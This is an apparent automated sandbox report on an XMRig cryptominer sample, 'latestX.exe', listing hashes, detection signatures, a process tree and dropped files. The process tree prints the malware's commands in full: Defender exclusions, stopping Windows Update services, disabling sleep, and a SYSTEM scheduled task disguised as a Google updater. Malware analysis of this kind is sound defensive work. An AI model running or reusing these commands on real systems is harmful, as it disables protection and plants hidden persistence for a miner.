Analysis

  • max time kernel
    311s
  • max time network
    313s
  • platform
    windows10-1703_x64
  • resource
    win10-20231023-en
  • resource tags

    arch:x64arch:x86image:win10-20231023-enlocale:en-usos:windows10-1703-x64system
  • submitted
    01-11-2023 05:41

General

  • Target

    latestX.exe

  • Size

    5.6MB

  • MD5

    bae29e49e8190bfbbf0d77ffab8de59d

  • SHA1

    4a6352bb47c7e1666a60c76f9b17ca4707872bd9

  • SHA256

    f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87

  • SHA512

    9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

  • SSDEEP

    49152:MMcDmMRlBdzs3EThgR0uEqBXLdcJAbtNmbOHaGhEospqOziZXAfrrARS7JL2ozPX:dcdrCET8XeospuZXAf0EJyocDKIVDT05

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 22 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3268
      • C:\Users\Admin\AppData\Local\Temp\latestX.exe
        "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2552
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3568
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2628
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:3544
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:196
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:4012
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:204
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:3000
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2268
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2516
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:696
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:372
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4480
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3944
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
        2⤵
          PID:948
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:596
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2952
          • C:\Windows\System32\sc.exe
            sc stop UsoSvc
            3⤵
            • Launches sc.exe
            PID:4952
          • C:\Windows\System32\sc.exe
            sc stop WaaSMedicSvc
            3⤵
            • Launches sc.exe
            PID:3456
          • C:\Windows\System32\sc.exe
            sc stop wuauserv
            3⤵
            • Launches sc.exe
            PID:2704
          • C:\Windows\System32\sc.exe
            sc stop bits
            3⤵
            • Launches sc.exe
            PID:5088
          • C:\Windows\System32\sc.exe
            sc stop dosvc
            3⤵
            • Launches sc.exe
            PID:4304
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3432
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-ac 0
            3⤵
              PID:1108
            • C:\Windows\System32\powercfg.exe
              powercfg /x -hibernate-timeout-dc 0
              3⤵
                PID:1692
              • C:\Windows\System32\powercfg.exe
                powercfg /x -standby-timeout-ac 0
                3⤵
                  PID:3440
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -standby-timeout-dc 0
                  3⤵
                    PID:3552
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                  2⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4612
                • C:\Windows\System32\conhost.exe
                  C:\Windows\System32\conhost.exe
                  2⤵
                    PID:3436
                  • C:\Windows\explorer.exe
                    C:\Windows\explorer.exe
                    2⤵
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4588
                • C:\Program Files\Google\Chrome\updater.exe
                  "C:\Program Files\Google\Chrome\updater.exe"
                  1⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Drops file in Program Files directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:3448

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Program Files\Google\Chrome\updater.exe

                  Filesize

                  5.6MB

                  MD5

                  bae29e49e8190bfbbf0d77ffab8de59d

                  SHA1

                  4a6352bb47c7e1666a60c76f9b17ca4707872bd9

                  SHA256

                  f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87

                  SHA512

                  9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

                • C:\Program Files\Google\Chrome\updater.exe

                  Filesize

                  5.6MB

                  MD5

                  bae29e49e8190bfbbf0d77ffab8de59d

                  SHA1

                  4a6352bb47c7e1666a60c76f9b17ca4707872bd9

                  SHA256

                  f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87

                  SHA512

                  9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  3KB

                  MD5

                  8592ba100a78835a6b94d5949e13dfc1

                  SHA1

                  63e901200ab9a57c7dd4c078d7f75dcd3b357020

                  SHA256

                  fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

                  SHA512

                  87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  f0551304035439de70f6ea73437560fd

                  SHA1

                  af7a334953f80bea6918238c21ad67485f26aaee

                  SHA256

                  790be2f1eeb2e1f416ce51630f41c62bc71e31a59131a1d92652ec88418d10e7

                  SHA512

                  6b17265c5f7e4c1e81d996d1ca9e8a1d1bef101138ca645df37cf18a75f95e9de6a94070ec7571031e20abbb7968be549fa7abcda202733ae07e74c520a85c24

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wtifpv33.o12.ps1

                  Filesize

                  1B

                  MD5

                  c4ca4238a0b923820dcc509a6f75849b

                  SHA1

                  356a192b7913b04c54574d18c28d46e6395428ab

                  SHA256

                  6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                  SHA512

                  4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  3KB

                  MD5

                  811d351aabd7b708fef7683cf5e29e15

                  SHA1

                  06fd89e5a575f45d411cf4b3a2d277e642e73dbb

                  SHA256

                  0915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18

                  SHA512

                  702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  302a7c179ef577c237c5418fb770fd27

                  SHA1

                  343ef00d1357a8d2ff6e1143541a8a29435ed30c

                  SHA256

                  9e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f

                  SHA512

                  f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699

                • memory/596-232-0x0000029E46270000-0x0000029E46280000-memory.dmp

                  Filesize

                  64KB

                • memory/596-113-0x00007FFEE5BA0000-0x00007FFEE658C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/596-266-0x00007FFEE5BA0000-0x00007FFEE658C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/596-233-0x0000029E46270000-0x0000029E46280000-memory.dmp

                  Filesize

                  64KB

                • memory/596-175-0x0000029E46390000-0x0000029E4639A000-memory.dmp

                  Filesize

                  40KB

                • memory/596-142-0x0000029E46580000-0x0000029E46639000-memory.dmp

                  Filesize

                  740KB

                • memory/596-135-0x00007FF771F10000-0x00007FF771F20000-memory.dmp

                  Filesize

                  64KB

                • memory/596-136-0x0000029E463A0000-0x0000029E463BC000-memory.dmp

                  Filesize

                  112KB

                • memory/596-116-0x0000029E46270000-0x0000029E46280000-memory.dmp

                  Filesize

                  64KB

                • memory/596-115-0x0000029E46270000-0x0000029E46280000-memory.dmp

                  Filesize

                  64KB

                • memory/2268-103-0x00007FFEE5BA0000-0x00007FFEE658C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/2268-78-0x000001A2CB760000-0x000001A2CB770000-memory.dmp

                  Filesize

                  64KB

                • memory/2268-62-0x000001A2CB760000-0x000001A2CB770000-memory.dmp

                  Filesize

                  64KB

                • memory/2268-61-0x000001A2CB760000-0x000001A2CB770000-memory.dmp

                  Filesize

                  64KB

                • memory/2268-59-0x00007FFEE5BA0000-0x00007FFEE658C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/2552-105-0x00007FF6CCAB0000-0x00007FF6CD051000-memory.dmp

                  Filesize

                  5.6MB

                • memory/2552-0-0x00007FF6CCAB0000-0x00007FF6CD051000-memory.dmp

                  Filesize

                  5.6MB

                • memory/3436-573-0x00007FF618D90000-0x00007FF618DBA000-memory.dmp

                  Filesize

                  168KB

                • memory/3436-563-0x00007FF618D90000-0x00007FF618DBA000-memory.dmp

                  Filesize

                  168KB

                • memory/3448-558-0x00007FF76A670000-0x00007FF76AC11000-memory.dmp

                  Filesize

                  5.6MB

                • memory/3448-107-0x00007FF76A670000-0x00007FF76AC11000-memory.dmp

                  Filesize

                  5.6MB

                • memory/3568-11-0x000001E8A09C0000-0x000001E8A09D0000-memory.dmp

                  Filesize

                  64KB

                • memory/3568-12-0x000001E8A09C0000-0x000001E8A09D0000-memory.dmp

                  Filesize

                  64KB

                • memory/3568-10-0x00007FFEE5BA0000-0x00007FFEE658C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/3568-49-0x000001E8A09C0000-0x000001E8A09D0000-memory.dmp

                  Filesize

                  64KB

                • memory/3568-26-0x000001E8A09C0000-0x000001E8A09D0000-memory.dmp

                  Filesize

                  64KB

                • memory/3568-53-0x00007FFEE5BA0000-0x00007FFEE658C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/3568-7-0x000001E8B9040000-0x000001E8B9062000-memory.dmp

                  Filesize

                  136KB

                • memory/3568-13-0x000001E8B91F0000-0x000001E8B9266000-memory.dmp

                  Filesize

                  472KB

                • memory/4588-570-0x0000000011F30000-0x0000000011F50000-memory.dmp

                  Filesize

                  128KB

                • memory/4588-590-0x00007FF703CE0000-0x00007FF7044CF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4588-606-0x00007FF703CE0000-0x00007FF7044CF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4588-604-0x00007FF703CE0000-0x00007FF7044CF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4588-602-0x00007FF703CE0000-0x00007FF7044CF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4588-600-0x00007FF703CE0000-0x00007FF7044CF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4588-598-0x00007FF703CE0000-0x00007FF7044CF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4588-559-0x00000000003E0000-0x0000000000400000-memory.dmp

                  Filesize

                  128KB

                • memory/4588-562-0x0000000000F70000-0x0000000000FB0000-memory.dmp

                  Filesize

                  256KB

                • memory/4588-596-0x00007FF703CE0000-0x00007FF7044CF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4588-564-0x00007FF703CE0000-0x00007FF7044CF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4588-566-0x00007FF703CE0000-0x00007FF7044CF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4588-567-0x0000000011F30000-0x0000000011F50000-memory.dmp

                  Filesize

                  128KB

                • memory/4588-569-0x00007FF703CE0000-0x00007FF7044CF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4588-594-0x00007FF703CE0000-0x00007FF7044CF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4588-572-0x00007FF703CE0000-0x00007FF7044CF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4588-592-0x00007FF703CE0000-0x00007FF7044CF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4588-574-0x00007FF703CE0000-0x00007FF7044CF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4588-576-0x00007FF703CE0000-0x00007FF7044CF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4588-578-0x00007FF703CE0000-0x00007FF7044CF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4588-580-0x00007FF703CE0000-0x00007FF7044CF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4588-582-0x00007FF703CE0000-0x00007FF7044CF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4588-584-0x00007FF703CE0000-0x00007FF7044CF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4588-586-0x00007FF703CE0000-0x00007FF7044CF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4588-588-0x00007FF703CE0000-0x00007FF7044CF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4612-391-0x000001A4481C0000-0x000001A4481D0000-memory.dmp

                  Filesize

                  64KB

                • memory/4612-273-0x00007FFEE5BA0000-0x00007FFEE658C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/4612-276-0x000001A4481C0000-0x000001A4481D0000-memory.dmp

                  Filesize

                  64KB

                • memory/4612-275-0x000001A4481C0000-0x000001A4481D0000-memory.dmp

                  Filesize

                  64KB

                • memory/4612-296-0x00007FF7721D0000-0x00007FF7721E0000-memory.dmp

                  Filesize

                  64KB

                • memory/4612-390-0x000001A4481C0000-0x000001A4481D0000-memory.dmp

                  Filesize

                  64KB

                • memory/4612-551-0x00007FFEE5BA0000-0x00007FFEE658C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/4612-542-0x000001A4481C0000-0x000001A4481D0000-memory.dmp

                  Filesize

                  64KB

                • memory/4612-514-0x000001A4485C0000-0x000001A4485DC000-memory.dmp

                  Filesize

                  112KB